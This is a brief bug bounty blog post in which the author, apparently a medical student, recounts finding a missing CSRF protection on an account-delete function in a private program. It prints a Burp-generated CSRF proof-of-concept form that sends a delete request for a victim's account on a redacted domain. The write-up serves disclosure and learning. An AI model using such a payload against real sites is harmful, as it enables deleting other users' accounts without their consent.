How I found my first valid Bug!

1 min readMay 7, 2021


In the name of Allah, i begin.

Hi. I am Orin from Bangladesh. I am a medical student. for last couple of months I have been trying to get atleast one of my bug triaged but all I have been getting is duplicate. But finally one of my bug got triaged. Here I’m gonna explain how I exploited it.

Recently I got invited into a private program. Normally I look for every button or feature of a website and poke around a little bit to see how that function works and how can I manipulate it. In there most of the feature used CSRF token accept the delete button and no confirmation mail was sent to verify it.

So I quickly generated a CSRF payload (using burp) and tried it on my second account. And BOoM! It got executed. I was successfully able to delete the second account through CSRF. Here is my payload :

<! — CSRF PoC — generated by Burp Suite Professional →
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”https://www.[REDACTED].com/$victim_username/main/send_delete_request" method=”POST”>
<input type=”hidden” name=”message” value=”Bug&#32;Hunting&#32;Test&#32;1" />
<input type=”submit” value=”Submit request” />

It got triaged as medium severity and I got 7 points for it.




Hey. It’s me. Orin. I am a medical student but doing Bug Bounty for fun